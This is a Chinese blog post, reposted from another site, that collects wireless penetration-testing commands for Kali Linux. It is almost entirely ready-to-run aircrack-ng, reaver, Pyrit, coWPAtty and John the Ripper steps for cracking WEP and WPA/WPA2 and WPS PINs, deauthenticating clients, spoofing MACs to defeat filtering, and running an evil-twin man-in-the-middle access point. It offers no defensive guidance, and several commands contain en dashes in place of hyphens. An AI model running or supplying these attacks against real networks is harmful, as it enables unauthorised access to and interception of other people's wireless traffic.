无线渗透测试总结

无线安全 2017-12-03

如今,几乎人人都有手机,移动端设备数不胜数,手机、平板、笔记本都要使用无线网络,所以无线安全是非常重要的,本文的主要目的是无线渗透测试的方法总结,本文来源于老外的总结,可以点击原文连接查看原文,这里使用的操作系统是kali。

基本操作

关掉监控进程

root@uceka:~# airmon-ng check kill

打开监控模块

root@uceka:~# ifconfig wlan0 down
root@uceka:~# airmon-ng start wlan0
# if you get an error with airmon-ng command, try this ;
# iwconfig wlan0 mode monitor
root@uceka:~# ifconfig wlan0 up

增加Wifi发送功率

root@uceka:~# iw reg set B0
root@uceka:~# iwconfig wlan0 txpower <NmW|NdBm|off|auto>
#txpower is 30 (generally)
#txpower is depends your country, please googling
root@uceka:~# iwconfig

更改WiFi频道

root@uceka:~# iwconfig wlan0 channel <SetChannel(1-14)>

破解WEP

方法一:伪造身份验证攻击

root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
#What’s my mac?
root@uceka:~# macchanger --show wlan0mon
root@uceka:~# aireplay-ng -1 0 -a <BSSID> -h <OurMac> -e <ESSID> wlan0mon
root@uceka:~# aireplay-ng -2 –p 0841 –c FF:FF:FF:FF:FF:FF –b <BSSID> -h <OurMac> wlan0mon
root@uceka:~# aircrack-ng –b <BSSID> <PCAP_of_FileName>

方法二:ARP重播攻击

root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
#What’s my mac?
root@uceka:~# macchanger --show wlan0mon
root@uceka:~# aireplay-ng -3 –x 1000 –n 1000 –b <BSSID> -h <OurMac> wlan0mon
root@uceka:~# aircrack-ng –b <BSSID> <PCAP_of_FileName>

方法三:ChopChop攻击

root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
#What’s my mac?
root@uceka:~# macchanger --show wlan0mon
root@uceka:~# aireplay-ng -1 0 –e <ESSID> -a <BSSID> -h <OurMac> wlan0mon
root@uceka:~# aireplay-ng -4 –b <BSSID> -h <OurMac> wlan0mon
 #Press ‘y’ ;
root@uceka:~# packetforge-ng -0 –a <BSSID> -h <OurMac> -k <SourceIP> -l <DestinationIP> 
-y <XOR_PacketFile> -w <FileName2>
root@uceka:~# aireplay-ng -2 –r <FileName2> wlan0mon
root@uceka:~# aircrack-ng <PCAP_of_FileName>

方法四:碎片攻击

root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
#What’s my mac?
root@uceka:~# macchanger --show wlan0mon
root@uceka:~# aireplay-ng -1 0 –e <ESSID> -a <BSSID> -h <OurMac> wlan0mon
root@uceka:~# aireplay-ng -5 –b<BSSID> -h < OurMac > wlan0mon
#Press ‘y’ ;
root@uceka:~# packetforge-ng -0 –a <BSSID> -h < OurMac > -k <SourceIP> -l 
<DestinationIP> -y <XOR_PacketFile> -w <FileName2>
root@uceka:~# aireplay-ng -2 –r <FileName2> wlan0mon
root@uceka:~# aircrack-ng <PCAP_of_FileName>

SKA(共享密钥认证)类型破解

root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
root@uceka:~# aireplay-ng -0 10 –a <BSSID> -c <VictimMac> wlan0mon
root@uceka:~# ifconfig wlan0mon down
root@uceka:~# macchanger –-mac <VictimMac> wlan0mon
root@uceka:~# ifconfig wlan0mon up
root@uceka:~# aireplay-ng -3 –b <BSSID> -h <FakedMac> wlan0mon
root@uceka:~# aireplay-ng –-deauth 1 –a <BSSID> -h <FakedMac> wlan0mon
root@uceka:~# aircrack-ng <PCAP_of_FileName>

WPA / WPA2破解

方法一:WPS攻击

root@uceka:~# airmon-ng start wlan0
root@uceka:~# apt-get install reaver
root@uceka:~# wash –i wlan0mon 
root@uceka:~# reaver –i wlan0mon –b <BSSID> -vv –S
#or, Specific attack
root@uceka:~# reaver –i wlan0mon –c <Channel> -b <BSSID> -p <PinCode> -vv –S

方法二:字典破解

root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
root@uceka:~# aireplay-ng -0 1 –a <BSSID> -c <VictimMac> wlan0mon
root@uceka:~# aircrack-ng –w <WordlistFile> -b <BSSID> <Handshaked_PCAP>

方法三:使用John The Ripper破解

root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c <Channel> --bssid <BSSID> -w <FileName> wlan0mon
root@uceka:~# aireplay-ng -0 1 –a <BSSID> -c <VictimMac> wlan0mon
root@uceka:~# cd /pentest/passwords/john
root@uceka:~# ./john –wordlist=<Wordlist> --rules –stdout|aircrack-ng -0 –e 
<ESSID> -w - <PCAP_of_FileName>

方法四:使用coWPAtty破解

root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c <Channel> --bssid <BSSID> -w <FileName> wlan0mon
root@uceka:~# aireplay-ng -0 1 –a <BSSID> -c <VictimMac> wlan0mon
root@uceka:~# cowpatty –r <FileName> -f <Wordlist> -2 –s <SSID>
root@uceka:~# genpmk –s <SSID> –f <Wordlist> -d <HashesFileName>
root@uceka:~# cowpatty –r <PCAP_of_FileName> -d <HashesFileName> -2 –s <SSID>

方法五:使用Pyrit破解

root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c <Channel> --bssid <BSSID> -w <FileName> wlan0mon
root@uceka:~# aireplay-ng -0 1 –a <BSSID> -c <VictimMac> wlan0mon
root@uceka:~# pyrit –r<PCAP_of_FileName> -b <BSSID> -i <Wordlist> attack_passthrough
root@uceka:~# pyrit –i <Wordlist> import_passwords
root@uceka:~# pyrit –e <ESSID> create_essid
root@uceka:~# pyrit batch
root@uceka:~# pyrit –r <PCAP_of_FileName> attack_db

方法六:重建WPA密钥数据库攻击

root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
root@uceka:~# aireplay-ng -0 1 –a <BSSID> -c <VictimMac> wlan0mon
root@uceka:~# kwrite ESSID.txt
root@uceka:~# airolib-ng NEW_DB --import essid ESSID.txt
root@uceka:~# airolib-ng NEW_DB --import passwd <DictionaryFile>
root@uceka:~# airolib-ng NEW_DB --clean all
root@uceka:~# airolib-ng NEW_DB --stats
root@uceka:~# airolib-ng NEW_DB --batch
root@uceka:~# airolib-ng NEW_DB --verify all
root@uceka:~# aircrack-ng –r NEW_DB <Handshaked_PCAP>

找出隐藏SSID

root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c <Channel> --bssid <BSSID> wlan0mon
root@uceka:~# aireplay-ng -0 20 –a <BSSID> -c <VictimMac> wlan0mon

绕过MAC过滤

root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
root@uceka:~# aireplay-ng -0 10 –a <BSSID> -c <VictimMac> wlan0mon
root@uceka:~# ifconfig wlan0mon down
root@uceka:~# macchanger –-mac <VictimMac> wlan0mon
root@uceka:~# ifconfig wlan0mon up
root@uceka:~# aireplay-ng -3 –b <BSSID> -h <FakedMac> wlan0mon

中间人攻击

root@uceka:~# airmon-ng start wlan0
root@uceka:~# airbase-ng –e “<FakeBSSID>” wlan0mon
root@uceka:~# brctl addbr <VariableName>
root@uceka:~# brctl addif <VariableName> wlan0mon
root@uceka:~# brctl addif <VariableName> at0
root@uceka:~# ifconfig eth0 0.0.0.0 up
root@uceka:~# ifconfig at0 0.0.0.0 up
root@uceka:~# ifconfig <VariableName> up
root@uceka:~# aireplay-ng –deauth 0 –a <victimBSSID> wlan0mon
root@uceka:~# dhclient3 <VariableName> &
root@uceka:~# wireshark &
;select <VariableName> interface

总结

以上内容均来自uceka.com的博客,请自行测试,我只是作为一个备份,以备不时只需。需要查看原文的请点击原文连接查看。


本文由 myh0st 创作,采用 知识共享署名 3.0,可自由转载、引用,但需署名作者且注明文章出处。

楼主残忍的关闭了评论